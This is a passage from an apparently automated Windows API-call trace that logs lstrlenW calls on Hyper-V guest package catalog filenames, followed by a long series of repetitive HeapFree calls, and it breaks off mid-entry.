(lpString="HyperV-Guest-DynamicMemory-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 75 [0102.973] lstrlenW (lpString="HyperV-Guest-Heartbeat-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 84 [0102.973] lstrlenW (lpString="HyperV-Guest-Heartbeat-onecore-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 79 [0102.974] lstrlenW (lpString="HyperV-Guest-Heartbeat-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 76 [0102.974] lstrlenW (lpString="HyperV-Guest-Heartbeat-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 71 [0102.974] lstrlenW (lpString="HyperV-Guest-IcSvc-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 72 [0102.974] lstrlenW (lpString="HyperV-Guest-IcSvc-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat") returned 67 [0102.974] lstrlenW (lpString="HyperV-Guest-IcSvcExt-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat") returned 83 [0103.324] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x734030 | out: hHeap=0x6f0000) returned 1 [0103.324] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x732dd0 | out: hHeap=0x6f0000) returned 1 [0103.388] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7354b8 | out: hHeap=0x6f0000) returned 1 [0103.394] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7354b8 | out: hHeap=0x6f0000) returned 1 [0103.394] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x734258 | out: hHeap=0x6f0000) returned 1 [0103.394] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7374c0 | out: hHeap=0x6f0000) returned 1 [0103.394] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7374c0 | out: hHeap=0x6f0000) returned 1 [0103.396] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7416d8 | out: hHeap=0x6f0000) returned 1 [0103.397] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x740478 | out: hHeap=0x6f0000) returned 1 [0103.399] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7416d8 | out: hHeap=0x6f0000) returned 1 [0103.400] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7416d8 | out: hHeap=0x6f0000) returned 1 [0103.400] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x740478 | out: hHeap=0x6f0000) returned 1 [0103.402] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7416d8 | out: hHeap=0x6f0000) returned 1 [0103.403] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x742938 | out: hHeap=0x6f0000) returned 1 [0103.404] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7416d8 | out: hHeap=0x6f0000) returned 1 [0103.404] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7416d8 | out: hHeap=0x6f0000) returned 1 [0103.405] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7416d8 | out: hHeap=0x6f0000) returned 1 [0103.405] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743b98 | out: hHeap=0x6f0000) returned 1 [0103.406] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743b98 | out: hHeap=0x6f0000) returned 1 [0103.406] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x740478 | out: hHeap=0x6f0000) returned 1 [0103.406] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73f218 | out: hHeap=0x6f0000) returned 1 [0103.406] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73dfb8 | out: hHeap=0x6f0000) returned 1 [0103.409] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x740478 | out: hHeap=0x6f0000) returned 1 [0103.411] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x740478 | out: hHeap=0x6f0000) returned 1 [0103.412] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73f218 | out: hHeap=0x6f0000) returned 1 [0103.412] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x73dfb8 | out: hHeap=0x6f0000) returned 1 [0103.412] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743b98 | out: hHeap=0x6f0000) returned 1 [0103.412] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743b98 | out: hHeap=0x6f0000) returned 1 [0103.412] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738720 | out: hHeap=0x6f0000) returned 1 [0103.412] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7374c0 | out: hHeap=0x6f0000) returned 1 [0103.413] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743b98 | out: hHeap=0x6f0000) returned 1 [0103.413] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x736260 | out: hHeap=0x6f0000) returned 1 [0103.416] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7374c0 | out: hHeap=0x6f0000) returned 1 [0103.416] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x736260 | out: hHeap=0x6f0000) returned 1 [0103.416] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x736260 | out: hHeap=0x6f0000) returned 1 [0103.417] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x736260 | out: hHeap=0x6f0000) returned 1 [0103.417] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x736260 | out: hHeap=0x6f0000) returned 1 [0103.418] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738720 | out: hHeap=0x6f0000) returned 1 [0103.418] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7374c0 | out: hHeap=0x6f0000) returned 1 [0103.418] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x736260 | out: hHeap=0x6f0000) returned 1 [0103.419] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738720 | out: hHeap=0x6f0000) returned 1 [0103.419] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7374c0 | out: hHeap=0x6f0000) returned 1 [0103.419] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x736260 | out: hHeap=0x6f0000) returned 1 [0103.419] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743b98 | out: hHeap=0x6f0000) returned 1 [0103.422] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743eb0 | out: hHeap=0x6f0000) returned 1 [0103.425] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743eb0 | out: hHeap=0x6f0000) returned 1 [0103.467] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x743f70 | out: hHeap=0x6f0000) returned 1 [0103.469] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738740 | out: hHeap=0x6f0000) returned 1 [0103.469] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7383f8 | out: hHeap=0x6f0000) returned 1 [0103.473] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x738808 | out: hHeap=0x6f0000) returned 1 [0103.473] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7383f8 | out: hHeap=0x6f0000) returned 1 [0103.481] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7388d0 | out: hHeap=0x6f0000) returned 1 [0103.482] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x74ee10 | out: hHeap=0x6f0000) returned 1 [0103.483] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.483] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x74ee10 | out: hHeap=0x6f0000) returned 1 [0103.483] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7388d0 | out: hHeap=0x6f0000) returned 1 [0103.497] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x74ee10 | out: hHeap=0x6f0000) returned 1 [0103.505] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.505] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.506] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.506] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.506] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.507] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.507] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.508] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.508] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.508] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.509] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.509] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.513] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.514] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.514] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.515] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.515] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.515] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.558] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.559] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.559] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.559] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.559] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.560] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.561] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.562] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.563] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.563] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.563] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.564] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.564] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.564] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.564] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.564] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.565] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.565] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.565] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.565] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.566] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.566] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.571] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.571] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.572] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.572] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.572] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.573] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.573] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.573] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.577] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.578] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.578] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.578] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.579] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.579] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.579] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.579] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.579] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.580] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.580] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.580] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.581] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.581] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.581] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.581] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.582] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.582] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.582] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.588] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.589] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.589] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.590] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.593] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.593] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.593] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.593] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.594] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.594] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.594] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.595] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.595] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.595] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.596] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.596] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.596] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.596] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.596] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.597] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.597] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.597] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.598] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.598] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.598] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.598] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.599] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.639] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.640] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.641] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.642] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.643] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.643] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.643] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.643] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.644] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.644] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.644] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.645] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.645] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.645] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.645] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.645] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.646] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.646] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.649] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.650] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.650] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.656] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.656] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.656] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.656] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.656] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.657] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.657] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.657] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.658] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.658] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.658] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.658] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.658] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.659] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.659] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.659] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.659] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.659] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.660] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.660] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.662] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.662] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.662] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.663] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.663] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.663] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.664] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.664] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.664] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.664] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.665] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.665] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.666] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.666] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.667] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.667] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.667] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.668] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.668] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.668] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | out: hHeap=0x6f0000) returned 1 [0103.669] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x750070 | 